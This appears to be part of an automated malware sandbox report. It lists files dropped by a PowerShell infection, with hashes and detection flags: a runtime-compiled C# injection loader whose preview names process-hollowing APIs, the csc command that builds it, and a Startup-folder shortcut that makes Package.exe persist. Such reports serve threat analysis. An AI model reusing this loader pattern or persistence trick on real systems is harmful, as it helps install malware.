Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.3.1.5.2.6.1.5.0.9.2.1.8.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.3.1.5.2.6.2.4.1.5.4.6.7.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.6.1.2.a.c.2.6.-.7.d.5.9.-.4.5.0.f.-.a.3.6.5.-.5.8.a.4.a.1.9.5.2.7.e.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.3.a.3.a.b.f.-.3.9.0.4.-.4.a.7.5.-.8.2.0.3.-.6.4.9.d.4.e.1.e.e.1.f.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.a.c.k.a.g.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.O.L.E.V.I.E.W...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.9.c.-.0.0.0.1.-.0.0.1.4.-.4.6.a.6.-.7.1.1.e.4.2.5.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.2.5.6.b.a.6.7.4.a.c.b.7.8.b.b.9.d.d.5.0.0.d.6.f.4.c.d.0.1.4.b.0.0.0.0.0.9.0.4.!.0.0.0.0.e.4.1.0.6.8.6.1.0.7.6.9.8.1.7.9.9.7.1.9.8.7.6.0.1.9.f.e.5.2.2.4.e.a.c.2.6.5.5.c.!.P.a.c.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E5B.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Jan 2 18:14:21 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	31894
Entropy (8bit):	2.6145503567531416
Encrypted:	false
SSDEEP:	96:5c8xNsAUeetUGnJ7hhMTbjtLKIYOiFrgi7Co1z65FdumVweYe/CZ/OYfOUHxfmrl:ZkbhYN6UOz2puJ0LUGi4qprPrl9h6
MD5:	9F4C36E6AF7017C587FDB7C541BC8D4A
SHA1:	2188AA7031968AF0A0153AF432E853F8582566CC
SHA-256:	D30DC04F05007FD155943D1BEEA604B831B607A7C892A29220DAB577587188B3
SHA-512:	941A7238E1248F498AD6C51D091D3B6D50F0E5D086F81B8D87BCD8928E83B1B161C9155FFC122D6D40F8677CDC0EB5316A9B52EC55BD1948380DC9BA3046C5A7
Malicious:	false
Preview:	MDMP..a..... .......}.vg............4...........P...<...........P%..........T.......8...........T...........8...^h......................x...............................................................................eJ..............GenuineIntel............T...........q.vg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F27.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8338
Entropy (8bit):	3.68990649255784
Encrypted:	false
SSDEEP:	192:R6l7wVeJNw6o+6Y8aVSUFTgmf2axWrpDG89bjYsfIhm:R6lXJ66p6YDSUhgmf2axojLfz
MD5:	09150379EF70D9081CC3927ED13C2364
SHA1:	1A8B76E4B5E8AE896FA831D2690496940BE59B71
SHA-256:	19143B54978A5AC0CDDA9A3D25204F226FC2AB5B772CE32466A2D6CB45B15804
SHA-512:	61F050A2B9F6F84E4D47D6CC27924E5B7830D99CABDE83548ADBA058F183DBB0E08B356B0D5E49B289FA1B01D7BE932896FBE9EAA750C468BC43A6C0E02843F0
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.9.7.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER70AF.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4741
Entropy (8bit):	4.459452469518885
Encrypted:	false
SSDEEP:	48:cvIwWl8zsPJg77aI97YWpW8VYOYm8M4JwerFhFDoq2o+q8vqFKsfQyJod:uIjfxI71R7V+Jwe2oKjsfhJod
MD5:	6EB91043F67EA1CEE557B52EA05ADA88
SHA1:	6755966EE79042CDDA81C45A2F8CECB1D85F950C
SHA-256:	59AC6C8CE8412DE4AEDE8144A8C11F5E8D3F24139D4BA2E335F81054C341500A
SHA-512:	B241DD0AC9B5E11C57253C4ED0D1BFB4A8AC7F24CF94EAB1A045A0487E38937735A44CE7652C9B9B31459E609BC20D855E859B3DBF4ED037EBAEA2E2E7B31DB4
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="658637" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\RES4C9B.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Thu Jan 2 19:29:30 2025, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1336
Entropy (8bit):	3.9693859673122383
Encrypted:	false
SSDEEP:	24:Hym9p4yu2/plQH5hwKTFexmfwI+ycuZhNJGakSYXPNnqSSd:lumLQZKKTAxmo1ulJGa3YFqSC
MD5:	1B6AE310BA78AA657B7E3CFBF0A583AF
SHA1:	323F88EAB1C2D18C05582DE5D7BE03C211DD935F
SHA-256:	402EB382162D74F05CC8DEC381EF753B2A6F3DB915B20F6DADA2A7CEF99BE0BF
SHA-512:	4D0A49324E3D7DEC4B0E32EE33CC70A410E6B8FD783A55CEB078E19674D7C1589CAF8B2110A8391000084EAA21DBD41EE8DF1A80AFD9BC4B94816A6BBDEBC721
Malicious:	false
Preview:	L.....vg.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\iacipmps\CSCF2F885C8C35E43FC9D7ABBAE94A3C2AF.TMP....................9.B.Q>...tq............5.......C:\Users\user\AppData\Local\Temp\RES4C9B.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.a.c.i.p.m.p.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3g0oggsa.xw4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cf2yuriw.cdh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fg4uv1vj.wrb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ouvqs2i0.1pp.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vnzc5ebu.1v3.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xuhzok25.5wm.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\iacipmps\CSCF2F885C8C35E43FC9D7ABBAE94A3C2AF.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0737787616577057
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryDGak7YnqqYXPN5Dlq5J:+RI+ycuZhNJGakSYXPNnqX
MD5:	97DFA4399042C6513EF99F9C7471BFAA
SHA1:	1EF705AC5BCAD535548C56CDBEA84B97E2FBA479
SHA-256:	68E92F3471464B03E0106FC4DB07C9EACC126BFE4B9A8A14F3F2461ED5E36CF9
SHA-512:	C663D41EDAD72179437034C691E339CB12194753EB4C32EE8A3E519D2D563438B51468FEF14DD09CBF49ECBFBFC78BD08B19DBF08D48E8ECD3DDFE0A96905BBC
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.a.c.i.p.m.p.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...i.a.c.i.p.m.p.s...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.0.cs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	11063
Entropy (8bit):	4.54611001642782
Encrypted:	false
SSDEEP:	192:2QC2o4mAQgOLocU9wMk2kAt/Z7pu/cuvnzHzrEo6uT:2oYLoH97t/Z7pgjvzf5DT
MD5:	3FA79DECFF8805745CEA8116D9BB2643
SHA1:	92343C5FA2C768B964AE3A4E9136E5D7193E8558
SHA-256:	E6852A401B53A7AF04D57AA1E4FC9621E3DFFC1221534142316A27AE67E8F89C
SHA-512:	5C2879E59FA6609E6E87F70C5237B250A906BF7DD13A343DAC9E81635B1FC91AD9374E643A306B99503C52CE9BD56554A64AA132584C732D43EE39FB17305D78
Malicious:	true
Preview:	.using System;..using System.Diagnostics;..using System.IO;..using System.Net;..using System.Runtime.InteropServices;..using System.Threading.Tasks;....public class ClasserPlus..{.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.... public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..

C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	206
Entropy (8bit):	4.843266107095087
Encrypted:	false
SSDEEP:	6:pAu+H2L/6K2923fhGM2zba0zxszI923fhGM2zb1WH:p37L/6Kzpbh0wpbr
MD5:	6CCEC30D380707E04A225024B8DC1472
SHA1:	5FFE0A08F9427DA4D90C8C87FE12D92F9787F3FF
SHA-256:	EE37BF62A7B90C2AC80A63DF783DBB2AFD2BAEFAF5D48B5281B4559BEF5C9E44
SHA-512:	A867FB9DCAA17C3262ADE731C101EAA2B386A4D5331F7524625E2D2C9AF681CFFFAE36B8007EC53597F10DB8EBD72ACF2C5850E27C8AC20CC2D6532F7D6C8157
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.0.cs"

C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	4.627020999078849
Encrypted:	false
SSDEEP:	192:FRH6HN4QhfNQ8q8888yYAd3vRjOaaUxRa95MqBYkeN45qTY:ENxN3v9Od+a95MqOS50
MD5:	C3A1CACAB6C9DA264831929FB1BECF27
SHA1:	469CDA1C3E7176E41474CFA898196BB4B8D9EC85
SHA-256:	FA2E5E84D3E56887507BEBC6113440F5E20B9F6C2500D94B3C95AC39EDE7D8BE
SHA-512:	5D5D5EFFD4AED411B451654CC0E8243675EBAF9E6C8FCBB34B1E00EB75BFFC3F2E6B39412BD91C8E846719187DEE86F1969FA8AFE1468FEE74026AB26381742D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....vg...........!.................<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................<......H........%.............................................................."..(...."..(......(.......0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p.....(......(.........(....(.........*....0..:........e...+X......YE................................................+....+....,..?.+...+...+......X...2...8..............................(....(....}....~....r...pr...p~....~..... ....~.........o3.......-.s....z..<

C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.out

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	705
Entropy (8bit):	5.174004498686329
Encrypted:	false
SSDEEP:	12:KMi/qR37L/6Kzpbh0wpbqKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KMoqdn6Kz9cKax5DqBVKVrdFAMBJTH
MD5:	EFEEDF8FE3E6DDBBB1A7ACF244288158
SHA1:	AD3BAE981994E5DE46F029AB94FF49A4B031F339
SHA-256:	0A084D7617D715774A973102B53C228334E454AC879356B313B8E98C3B118493
SHA-512:	5F4F881C7AA25F77D11A006B05A5B453C6447E2B186EF2D7B2DB3FA589F8DDD52FE825AC3C92F2970B66C6029AEB4C10BB1A630239BDF67FF628BB6CCAD2759D
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.703385685445227
Encrypted:	false
SSDEEP:	96:aTBHCXoYkvhkvCCtFO0AEwHflIO0AE6Hflc:aVUDFXHXz
MD5:	78B568902037A561709F4152E51F7366
SHA1:	EB607440C5F08E70BBC1B113AB2BF07335890F52
SHA-256:	449943E40119BD85D50F1832D65B2CAFFB542DC05620EE8273D6236A0F8130B3
SHA-512:	7D10BCE5A8C27314B8747CD6C1F6998FA6A386D2663730E3471FD06E634F8EA7267B497C9AD151FCB9B48E82A409F734F73721EFBF20CA69CD8547CB86A9FA95
Malicious:	false
Preview:	...................................FL..................F.".. ...d.......~/.B]..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......M..B]..u.9.B]......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl"Z......B.....................Bdg.A.p.p.D.a.t.a...B.V.1....."Z....Roaming.@......DWSl"Z......C.......................[.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl"Z......D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW#r..Windows.@......DWSl"Z......E.....................D_..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl"Z......G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl"Z......H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl"Z.....q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UJ0VAGNDGFWL3J2W3ZB7.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.703385685445227
Encrypted:	false
SSDEEP:	96:aTBHCXoYkvhkvCCtFO0AEwHflIO0AE6Hflc:aVUDFXHXz
MD5:	78B568902037A561709F4152E51F7366
SHA1:	EB607440C5F08E70BBC1B113AB2BF07335890F52
SHA-256:	449943E40119BD85D50F1832D65B2CAFFB542DC05620EE8273D6236A0F8130B3
SHA-512:	7D10BCE5A8C27314B8747CD6C1F6998FA6A386D2663730E3471FD06E634F8EA7267B497C9AD151FCB9B48E82A409F734F73721EFBF20CA69CD8547CB86A9FA95
Malicious:	false
Preview:	...................................FL..................F.".. ...d.......~/.B]..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......M..B]..u.9.B]......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl"Z......B.....................Bdg.A.p.p.D.a.t.a...B.V.1....."Z....Roaming.@......DWSl"Z......C.......................[.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl"Z......D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW#r..Windows.@......DWSl"Z......E.....................D_..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl"Z......G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl"Z......H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl"Z.....q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:///C:\Windows\Temp\Package.exe>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	61
Entropy (8bit):	4.981292305417088
Encrypted:	false
SSDEEP:	3:HRAbABGQYm5sMsgSE:HRYFVmyMsVE
MD5:	023F236CBD84BD3887E1186F9DE7359E
SHA1:	B7F015A8775C701D8F281541FDBF4B4A605C6070
SHA-256:	26F16FF4B0A1FED15960BA8E5EAB8DDB403265F8BB39AAED310A06998333CFF2
SHA-512:	327EC237DB8AC9C0BA6FC13738B08B73AC1BA3268BF967DF5AEA37DADC03FDB4E1FF75893FA276D08137CE4C9243BCFB2E0B199BC58B7B1A1BD076D6EFE3E6BC
Malicious:	true
Preview:	[InternetShortcut]..URL=file:///C:\Windows\Temp\Package.exe..

C:\Windows\Temp\Package.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	206304
Entropy (8bit):	5.9403786086887225
Encrypted:	false
SSDEEP:	3072:gyOSSX7XA5RwkP10/Cg+ufLLobyT9S9jHkQPEZS0bGAPo:tEXjA5yBF+ma9jHfPITGb
MD5:	2696D944FFBEF69510B0C826446FD748
SHA1:	E4106861076981799719876019FE5224EAC2655C
SHA-256:	A4F53964CDDDCCCBD1B46DA4D3F7F5F4292B5DD11C833D3DB3A1E7DEF36DA69A
SHA-512:	C286BC2DA757CBB2A28CF516A4A273DD11B15F674D5F698A713DC794F013B7502A8893AB6041E51BAB3CDD506A18C415B9DF8483B19E312F8FCB88923F42B8EB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: script.ps1, Detection: malicious, Browse Filename: script.hta, Detection: malicious, Browse
